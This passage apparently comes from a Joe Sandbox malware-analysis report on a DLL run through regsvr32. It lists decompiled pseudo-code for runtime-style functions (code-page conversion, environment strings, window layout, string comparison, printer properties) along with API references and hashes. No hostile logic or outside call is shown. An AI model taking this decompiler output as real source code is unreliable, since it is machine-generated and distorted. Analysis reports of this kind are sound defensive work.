						 *(_t97 - 4) =  *(_t97 - 4) | 0xffffffff;
						_t111 = _t82;
						if(_t82 != 0) {
							L19:
							_t68 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10),  *(_t97 - 0x40), _t82, _t94);
							__eflags = _t68;
							if(_t68 == 0) {
								L31:
								__eflags =  *(_t97 - 0x44);
								if(__eflags != 0) {
									_push(_t82);
									E100107C8(_t82, 0, _t94, __eflags);
								}
								_t57 =  *(_t97 - 0x34);
								goto L34;
							}
							__eflags =  *(_t97 + 0x18);
							if( *(_t97 + 0x18) == 0) {
								__eflags =  *(_t97 - 0x3c);
								if(__eflags != 0) {
									L25:
									_push(_t94);
									_push(1);
									_t69 = E1001382A(_t82, 0, _t94, __eflags);
									 *(_t97 - 0x34) = _t69;
									__eflags = _t69;
									if(_t69 != 0) {
										_t70 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, _t69, _t94, 0, 0);
										__eflags = _t70;
										if(__eflags != 0) {
											__eflags =  *(_t97 - 0x40) - 0xffffffff;
											if( *(_t97 - 0x40) != 0xffffffff) {
												 *( *(_t97 + 0x14)) = _t70;
											}
										} else {
											_push( *(_t97 - 0x34));
											E100107C8(_t82, 0, _t94, __eflags);
											 *(_t97 - 0x34) = 0;
										}
									}
									goto L31;
								}
								_t94 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, 0, 0, 0, 0);
								__eflags = _t94;
								if(__eflags == 0) {
									goto L31;
								}
								goto L25;
							}
							_t73 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94,  *(_t97 + 0x18),  *(_t97 + 0x1c), 0, 0);
							__eflags = _t73;
							if(_t73 != 0) {
								 *(_t97 - 0x34) =  *(_t97 + 0x18);
							}
							goto L31;
						} else {
							_push(_t94);
							_push(2);
							_t82 = E1001382A(_t82, 0, _t94, _t111);
							if(_t82 != 0) {
								 *(_t97 - 0x44) = 1;
								goto L19;
							}
							goto L17;
						}
					} else {
						_t94 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10), _t81, 0, 0);
						 *(_t97 - 0x38) = _t94;
						if(_t94 == 0) {
							L17:
							_t57 = 0;
							L34:
							return E1001254F(E100117AE(_t57,  *((intOrPtr*)(_t97 - 0x1c))));
						}
						goto L14;
					}
				}
			}















                                                                        0x1001a487
                                                                        0x1001a487
                                                                        0x1001a489
                                                                        0x1001a48e
                                                                        0x1001a493
                                                                        0x1001a498
                                                                        0x1001a49d
                                                                        0x1001a4a0
                                                                        0x1001a4a6
                                                                        0x1001a4a8
                                                                        0x1001a4ab
                                                                        0x1001a4ae
                                                                        0x1001a4b4
                                                                        0x1001a62d
                                                                        0x00000000
                                                                        0x1001a4ba
                                                                        0x1001a4ba
                                                                        0x1001a4c9
                                                                        0x1001a4e4
                                                                        0x1001a4e4
                                                                        0x1001a4ee
                                                                        0x1001a50a
                                                                        0x1001a4f0
                                                                        0x1001a4f3
                                                                        0x1001a4fc
                                                                        0x1001a501
                                                                        0x1001a504
                                                                        0x1001a504
                                                                        0x1001a4f5
                                                                        0x1001a4f5
                                                                        0x1001a4f5
                                                                        0x1001a505
                                                                        0x1001a505
                                                                        0x1001a510
                                                                        0x1001a52c
                                                                        0x1001a52c
                                                                        0x1001a538
                                                                        0x1001a53d
                                                                        0x1001a540
                                                                        0x1001a542
                                                                        0x1001a54b
                                                                        0x1001a553
                                                                        0x1001a570
                                                                        0x1001a572
                                                                        0x1001a592
                                                                        0x1001a59f
                                                                        0x1001a5a5
                                                                        0x1001a5a7
                                                                        0x1001a630
                                                                        0x1001a630
                                                                        0x1001a633
                                                                        0x1001a635
                                                                        0x1001a636
                                                                        0x1001a63b
                                                                        0x1001a63c
                                                                        0x00000000
                                                                        0x1001a63c
                                                                        0x1001a5ad
                                                                        0x1001a5b0
                                                                        0x1001a5d2
                                                                        0x1001a5d5
                                                                        0x1001a5ed
                                                                        0x1001a5ed
                                                                        0x1001a5ee
                                                                        0x1001a5f0
                                                                        0x1001a5f7
                                                                        0x1001a5fa
                                                                        0x1001a5fc
                                                                        0x1001a608
                                                                        0x1001a60e
                                                                        0x1001a610
                                                                        0x1001a620
                                                                        0x1001a624
                                                                        0x1001a629
                                                                        0x1001a629
                                                                        0x1001a612
                                                                        0x1001a612
                                                                        0x1001a615
                                                                        0x1001a61b
                                                                        0x1001a61b
                                                                        0x1001a610
                                                                        0x00000000
                                                                        0x1001a5fc
                                                                        0x1001a5e7
                                                                        0x1001a5e9
                                                                        0x1001a5eb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001a5eb
                                                                        0x1001a5c0
                                                                        0x1001a5c6
                                                                        0x1001a5c8
                                                                        0x1001a5cd
                                                                        0x1001a5cd
                                                                        0x00000000
                                                                        0x1001a574
                                                                        0x1001a574
                                                                        0x1001a575
                                                                        0x1001a57e
                                                                        0x1001a582
                                                                        0x1001a58b
                                                                        0x00000000
                                                                        0x1001a58b
                                                                        0x00000000
                                                                        0x1001a582
                                                                        0x1001a512
                                                                        0x1001a523
                                                                        0x1001a525
                                                                        0x1001a52a
                                                                        0x1001a584
                                                                        0x1001a584
                                                                        0x1001a63f
                                                                        0x1001a64f
                                                                        0x1001a64f
                                                                        0x00000000
                                                                        0x1001a52a
                                                                        0x1001a510

                                                                        APIs
                                                                        • GetCPInfo.KERNEL32(00000000,?,10042F10,00000038,100185C0,?,00000000,00000000,10012C1E,00000000,00000000,10042730,0000001C,1001294D,00000001,00000020), ref: 1001A4C5
                                                                        • GetCPInfo.KERNEL32(00000000,00000001), ref: 1001A4D8
                                                                        • _strlen.LIBCMT ref: 1001A4FC
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,10012C1E,?,00000000,00000000), ref: 1001A51D
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Info$ByteCharMultiWide_strlen
                                                                        • String ID:
                                                                        • API String ID: 1335377746-0
                                                                        • Opcode ID: a1739f8af5073df943149c03816b326863122fdfa87c5946c56ad2dc74c300ca
                                                                        • Instruction ID: 70101fa7554b3a37292e61141452f95f373fba0d19c42cfe0f4ebf6b77a3f96e
                                                                        • Opcode Fuzzy Hash: a1739f8af5073df943149c03816b326863122fdfa87c5946c56ad2dc74c300ca
                                                                        • Instruction Fuzzy Hash: 99514671900619ABDF21CFA5DC84D9EBBF9FF867A0B24411AF814AA190D7309DC1CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001666B Relevance: 12.1, APIs: 8, Instructions: 131COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E1001666B() {
				int _v4;
				int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t7;
				CHAR* _t8;
				WCHAR* _t16;
				int _t19;
				char* _t23;
				int _t24;
				long _t28;
				int _t29;
				void* _t34;
				WCHAR* _t36;
				CHAR* _t37;
				intOrPtr _t38;
				int _t40;

				_t7 =  *0x1004f700; // 0x1
				_t29 = 0;
				_t36 = 0;
				_t38 = 2;
				if(_t7 != 0) {
					L6:
					__eflags = _t7 - 1;
					if(__eflags != 0) {
						__eflags = _t7 - _t38;
						if(_t7 == _t38) {
							L21:
							_t8 = GetEnvironmentStrings();
							_t37 = _t8;
							__eflags = _t37 - _t29;
							if(_t37 == _t29) {
								L20:
								return 0;
							}
							__eflags =  *_t37 - _t29;
							if( *_t37 == _t29) {
								L25:
								_t39 = _t8 - _t37 + 1;
								_t34 = E100107B6(_t8 - _t37 + 1);
								__eflags = _t34 - _t29;
								if(_t34 != _t29) {
									E10011440(_t34, _t37, _t39);
								} else {
									_t34 = 0;
								}
								FreeEnvironmentStringsA(_t37);
								return _t34;
							} else {
								goto L23;
							}
							do {
								do {
									L23:
									_t8 =  &(_t8[1]);
									__eflags =  *_t8 - _t29;
								} while ( *_t8 != _t29);
								_t8 =  &(_t8[1]);
								__eflags =  *_t8 - _t29;
							} while ( *_t8 != _t29);
							goto L25;
						}
						__eflags = _t7 - _t29;
						if(_t7 == _t29) {
							goto L21;
						}
						goto L20;
					}
					L7:
					if(_t36 != _t29) {
						L9:
						_t16 = _t36;
						if( *_t36 == _t29) {
							L12:
							_t19 = (_t16 - _t36 >> 1) + 1;
							_v4 = _t19;
							_t40 = WideCharToMultiByte(_t29, _t29, _t36, _t19, _t29, _t29, _t29, _t29);
							if(_t40 != _t29) {
								_t23 = E100107B6(_t40);
								_v8 = _t23;
								if(_t23 != _t29) {
									_t24 = WideCharToMultiByte(_t29, _t29, _t36, _v4, _t23, _t40, _t29, _t29);
									_t52 = _t24;
									if(_t24 == 0) {
										_push(_v8);
										E100107C8(_t29, WideCharToMultiByte, _t36, _t52);
										_v8 = _t29;
									}
									_t29 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t36);
							return _t29;
						} else {
							goto L10;
						}
						do {
							do {
								L10:
								_t16 = _t16 + _t38;
							} while ( *_t16 != _t29);
							_t16 = _t16 + _t38;
						} while ( *_t16 != _t29);
						goto L12;
					}
					_t36 = GetEnvironmentStringsW();
					if(_t36 == _t29) {
						goto L20;
					}
					goto L9;
				}
				_t36 = GetEnvironmentStringsW();
				if(_t36 == 0) {
					_t28 = GetLastError();
					__eflags = _t28 - 0x78;
					if(_t28 != 0x78) {
						_t7 =  *0x1004f700; // 0x1
					} else {
						_t7 = _t38;
						 *0x1004f700 = _t7;
					}
					goto L6;
				} else {
					 *0x1004f700 = 1;
					goto L7;
				}
			}






















                                                                        0x1001666d
                                                                        0x1001667c
                                                                        0x1001667e
                                                                        0x10016684
                                                                        0x10016685
                                                                        0x100166b4
                                                                        0x100166b4
                                                                        0x100166b7
                                                                        0x10016736
                                                                        0x10016738
                                                                        0x10016742
                                                                        0x10016742
                                                                        0x10016748
                                                                        0x1001674a
                                                                        0x1001674c
                                                                        0x1001673e
                                                                        0x00000000
                                                                        0x1001673e
                                                                        0x1001674e
                                                                        0x10016750
                                                                        0x1001675c
                                                                        0x1001675f
                                                                        0x10016767
                                                                        0x10016769
                                                                        0x1001676c
                                                                        0x10016775
                                                                        0x1001676e
                                                                        0x1001676e
                                                                        0x1001676e
                                                                        0x1001677e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10016752
                                                                        0x10016752
                                                                        0x10016752
                                                                        0x10016752
                                                                        0x10016753
                                                                        0x10016753
                                                                        0x10016757
                                                                        0x10016758
                                                                        0x10016758
                                                                        0x00000000
                                                                        0x10016752
                                                                        0x1001673a
                                                                        0x1001673c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001673c
                                                                        0x100166b9
                                                                        0x100166bb
                                                                        0x100166c5
                                                                        0x100166c8
                                                                        0x100166ca
                                                                        0x100166da
                                                                        0x100166e8
                                                                        0x100166ed
                                                                        0x100166f3
                                                                        0x100166f7
                                                                        0x100166fa
                                                                        0x10016702
                                                                        0x10016706
                                                                        0x10016713
                                                                        0x10016715
                                                                        0x10016717
                                                                        0x10016719
                                                                        0x1001671d
                                                                        0x10016723
                                                                        0x10016723
                                                                        0x10016727
                                                                        0x10016727
                                                                        0x10016706
                                                                        0x1001672c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100166cc
                                                                        0x100166cc
                                                                        0x100166cc
                                                                        0x100166cc
                                                                        0x100166ce
                                                                        0x100166d3
                                                                        0x100166d5
                                                                        0x00000000
                                                                        0x100166cc
                                                                        0x100166bf
                                                                        0x100166c3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100166c3
                                                                        0x10016689
                                                                        0x1001668d
                                                                        0x1001669b
                                                                        0x100166a1
                                                                        0x100166a4
                                                                        0x100166af
                                                                        0x100166a6
                                                                        0x100166a6
                                                                        0x100166a8
                                                                        0x100166a8
                                                                        0x00000000
                                                                        0x1001668f
                                                                        0x1001668f
                                                                        0x00000000
                                                                        0x1001668f

                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016687
                                                                        • GetLastError.KERNEL32(?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001669B
                                                                        • GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100166BD
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,10011248), ref: 100166F1
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10011248,?,?), ref: 10016713
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001672C
                                                                        • GetEnvironmentStrings.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016742
                                                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 1001677E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 883850110-0
                                                                        • Opcode ID: bfeabb1aff3bc99bbfe24a1f77970b714d91aefed0498c732c899eb5009dd72e
                                                                        • Instruction ID: 9752ab07c098c977bc575d501e7eaa0deb9efe59c3b15e47417eb48d6ecdcefd
                                                                        • Opcode Fuzzy Hash: bfeabb1aff3bc99bbfe24a1f77970b714d91aefed0498c732c899eb5009dd72e
                                                                        • Instruction Fuzzy Hash: 7831A5B260D26A6FE311EF654CC882BBADCEB4E1D8712092DF681CB191D671DCC496A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10022499 Relevance: 12.1, APIs: 8, Instructions: 124windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 87%
                                                                        			E10022499(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagRECT _v36;
				void* _v40;
				void* __ebp;
				signed int _t61;
				int _t62;
				signed short _t63;
				void* _t64;
				void* _t72;
				intOrPtr* _t85;
				signed int _t87;
				struct HWND__* _t91;
				void* _t92;

				_t72 = __ecx;
				_v8 = 0;
				_v12 = _a28;
				_v16 = 0;
				_v20 = 0;
				if(_a24 == 0) {
					GetClientRect( *(__ecx + 0x1c),  &_v36);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				_t61 = _a16 & 0xffff7fff;
				_a24 = _t61;
				if(_t61 == 1) {
					_v40 = _v40 & 0x00000000;
				} else {
					_v40 = BeginDeferWindowPos(8);
				}
				_t62 = GetTopWindow( *(_t72 + 0x1c));
				while(1) {
					_t91 = _t62;
					if(_t91 == 0) {
						break;
					}
					_t63 = GetDlgCtrlID(_t91);
					_push(_t91);
					_t87 = _t63 & 0x0000ffff;
					_t64 = E10022115();
					if(_t87 != _a12) {
						if(_t87 >= _a4 && _t87 <= _a8 && _t64 != 0) {
							SendMessageA(_t91, 0x361, 0,  &_v40);
						}
					} else {
						_v8 = _t91;
					}
					_t62 = GetWindow(_t91, 2);
				}
				if(_a24 != 1) {
					if(_a12 != 0 && _v8 != 0) {
						_t62 = E100220EE(_t92, _v8);
						if(_a24 == 2) {
							_t85 = _a20;
							_v36.left = _v36.left +  *_t85;
							_v36.top = _v36.top +  *((intOrPtr*)(_t85 + 4));
							_v36.right = _v36.right -  *((intOrPtr*)(_t85 + 8));
							_v36.bottom = _v36.bottom -  *((intOrPtr*)(_t85 + 0xc));
						}
						if((_a17 & 0x00000080) == 0) {
							 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
							_t62 = E10020D81( &_v40, _v8,  &_v36);
						}
					}
					if(_v40 != 0) {
						_t62 = EndDeferWindowPos(_v40);
					}
				} else {
					if(_a28 == 0) {
						_t62 = _a20;
						 *((intOrPtr*)(_t62 + 8)) = _v20;
						 *((intOrPtr*)(_t62 + 4)) = 0;
						 *_t62 = 0;
						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
					} else {
						_t62 = CopyRect(_a20,  &_v36);
					}
				}
				return _t62;
			}



















                                                                        0x100224a8
                                                                        0x100224ae
                                                                        0x100224b1
                                                                        0x100224b4
                                                                        0x100224b7
                                                                        0x100224ba
                                                                        0x100224cc
                                                                        0x100224bc
                                                                        0x100224bf
                                                                        0x100224c0
                                                                        0x100224c1
                                                                        0x100224c2
                                                                        0x100224c2
                                                                        0x100224d5
                                                                        0x100224dd
                                                                        0x100224e0
                                                                        0x100224ef
                                                                        0x100224e2
                                                                        0x100224ea
                                                                        0x100224ea
                                                                        0x100224f6
                                                                        0x10022542
                                                                        0x10022542
                                                                        0x10022546
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10022501
                                                                        0x10022507
                                                                        0x10022508
                                                                        0x1002250b
                                                                        0x10022513
                                                                        0x1002251d
                                                                        0x10022533
                                                                        0x10022533
                                                                        0x10022515
                                                                        0x10022515
                                                                        0x10022515
                                                                        0x1002253c
                                                                        0x1002253c
                                                                        0x1002254c
                                                                        0x1002257b
                                                                        0x10022585
                                                                        0x1002258e
                                                                        0x10022590
                                                                        0x10022595
                                                                        0x1002259b
                                                                        0x100225a1
                                                                        0x100225a7
                                                                        0x100225a7
                                                                        0x100225ae
                                                                        0x100225b9
                                                                        0x100225c7
                                                                        0x100225c7
                                                                        0x100225ae
                                                                        0x100225cf
                                                                        0x100225d4
                                                                        0x100225d4
                                                                        0x1002254e
                                                                        0x10022551
                                                                        0x10022562
                                                                        0x10022568
                                                                        0x1002256e
                                                                        0x10022571
                                                                        0x10022573
                                                                        0x10022553
                                                                        0x1002255a
                                                                        0x1002255a
                                                                        0x10022551
                                                                        0x100225de

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
                                                                        • String ID:
                                                                        • API String ID: 1228040700-0
                                                                        • Opcode ID: 42fbaed3706ff63598f5f0fcd2255645fe957362c4a3063a48a191e489ec859f
                                                                        • Instruction ID: a778dc46a9958f4d0915ef63e23ed223fa2105f0a807d6ecff0719afcf2b0a04
                                                                        • Opcode Fuzzy Hash: 42fbaed3706ff63598f5f0fcd2255645fe957362c4a3063a48a191e489ec859f
                                                                        • Instruction Fuzzy Hash: D741477190062AEFCF11DFD4E8A49EEB7B5FF08340B51816AF905A7251C734AA50CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002535C Relevance: 12.1, APIs: 8, Instructions: 81stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1002535C(void* __ebx, void* __edi, void* __esi, char* _a4, CHAR* _a8) {
				intOrPtr _v8;
				short _v528;
				short _v1048;
				short _v1568;
				intOrPtr _t18;
				int _t20;
				int _t21;
				void* _t23;
				char* _t32;
				int _t37;
				char* _t42;
				void* _t47;
				void* _t49;

				_t18 =  *0x1004c470; // 0x303bb91f
				_t42 = _a4;
				_v8 = _t18;
				if(lstrcmpiA(_t42, _a8) == 0) {
					_t20 = GetSystemMetrics(0x2a);
					if(_t20 != 0) {
						_t21 = lstrlenA(_t42);
						if(_t21 != lstrlenA(_a8)) {
							L13:
							_t23 = 0;
						} else {
							_t37 = GetThreadLocale();
							GetStringTypeA(_t37, 1, _t42, 0xffffffff,  &_v528);
							GetStringTypeA(_t37, 4, _t42, 0xffffffff,  &_v1048);
							GetStringTypeA(_t37, 1, _a8, 0xffffffff,  &_v1568);
							_t32 = _t42;
							if( *_t42 == 0) {
								L10:
								_t23 = 1;
							} else {
								_t47 = 0;
								while(( *(_t49 + _t47 - 0x414) & 0x00000080) == 0 ||  *((intOrPtr*)(_t49 + _t47 - 0x20c)) ==  *((intOrPtr*)(_t49 + _t47 - 0x61c))) {
									_t47 = _t47 + 2;
									if( *_t32 != 0) {
										continue;
									} else {
										goto L10;
									}
									goto L11;
								}
								goto L13;
							}
						}
						L11:
					} else {
						_t23 = _t20 + 1;
					}
				} else {
					_t23 = 0;
				}
				return E100117AE(_t23, _v8);
			}
















                                                                        0x10025365
                                                                        0x1002536e
                                                                        0x10025372
                                                                        0x1002537d
                                                                        0x10025388
                                                                        0x10025390
                                                                        0x100253a1
                                                                        0x100253ac
                                                                        0x10025434
                                                                        0x10025434
                                                                        0x100253b2
                                                                        0x100253be
                                                                        0x100253cd
                                                                        0x100253dc
                                                                        0x100253ed
                                                                        0x100253f2
                                                                        0x100253f4
                                                                        0x10025422
                                                                        0x10025424
                                                                        0x100253f6
                                                                        0x100253f6
                                                                        0x100253f8
                                                                        0x10025416
                                                                        0x10025420
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10025420
                                                                        0x00000000
                                                                        0x100253f8
                                                                        0x100253f4
                                                                        0x10025425
                                                                        0x10025392
                                                                        0x10025392
                                                                        0x10025392
                                                                        0x1002537f
                                                                        0x1002537f
                                                                        0x1002537f
                                                                        0x10025431

                                                                        APIs
                                                                        • lstrcmpiA.KERNEL32(?,00000000), ref: 10025375
                                                                        • GetSystemMetrics.USER32 ref: 10025388
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: MetricsSystemlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 2335526769-0
                                                                        • Opcode ID: 1cbe2259d2c1a5909c7395cdd660f50db29ee15dbb1b64e3fa85e708783875df
                                                                        • Instruction ID: 2e24e30c7814501e8ef39cdb76116c26bdbe99ae311f6264528fd307033058d9
                                                                        • Opcode Fuzzy Hash: 1cbe2259d2c1a5909c7395cdd660f50db29ee15dbb1b64e3fa85e708783875df
                                                                        • Instruction Fuzzy Hash: BD21677150022D7ADB01EBB09C44FDEBBACEB453B2FA08661FC12D61C1D6718E818B64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001F60C Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E1001F60C(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x70);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x6c);
							if( *(_t35 + 0x6c) != 0) {
								E10029C1B(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x6c) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E10029C1B( *(_t35 + 0x6c));
								 *(_t35 + 0x6c) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}







                                                                        0x1001f60f
                                                                        0x1001f611
                                                                        0x1001f613
                                                                        0x1001f61b
                                                                        0x1001f635
                                                                        0x1001f63d
                                                                        0x1001f647
                                                                        0x1001f64e
                                                                        0x1001f650
                                                                        0x1001f655
                                                                        0x1001f658
                                                                        0x1001f658
                                                                        0x1001f66f
                                                                        0x1001f676
                                                                        0x1001f68e
                                                                        0x1001f693
                                                                        0x1001f698
                                                                        0x1001f698
                                                                        0x1001f69e
                                                                        0x1001f69e
                                                                        0x1001f64e
                                                                        0x1001f6a3
                                                                        0x1001f6a7

                                                                        APIs
                                                                        • GlobalLock.KERNEL32 ref: 1001F629
                                                                        • lstrcmpA.KERNEL32(?,?), ref: 1001F635
                                                                        • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1001F647
                                                                        • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001F667
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001F66F
                                                                        • GlobalLock.KERNEL32 ref: 1001F679
                                                                        • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1001F686
                                                                        • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1001F69E
                                                                          • Part of subcall function 10029C1B: GlobalFlags.KERNEL32(?), ref: 10029C25
                                                                          • Part of subcall function 10029C1B: GlobalUnlock.KERNEL32(?,00000000,?,1001F698,?,00000000,?,?,00000000,00000000,00000002), ref: 10029C36
                                                                          • Part of subcall function 10029C1B: GlobalFree.KERNEL32 ref: 10029C41
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                        • String ID:
                                                                        • API String ID: 168474834-0
                                                                        • Opcode ID: c3571f4809fef0992d903921779ddd8b1d2f29fd1f502d0743ce459bc184c30f
                                                                        • Instruction ID: 2a491371b327142203fc8723eb74c2771e75d1908c59da801caef355c7fd3301
                                                                        • Opcode Fuzzy Hash: c3571f4809fef0992d903921779ddd8b1d2f29fd1f502d0743ce459bc184c30f
                                                                        • Instruction Fuzzy Hash: 61118E76500208BEDB12DBAACC86D7F7AFDEF85784B50081DF645EA122D671ED80DB24
                                                                        Uniqueness

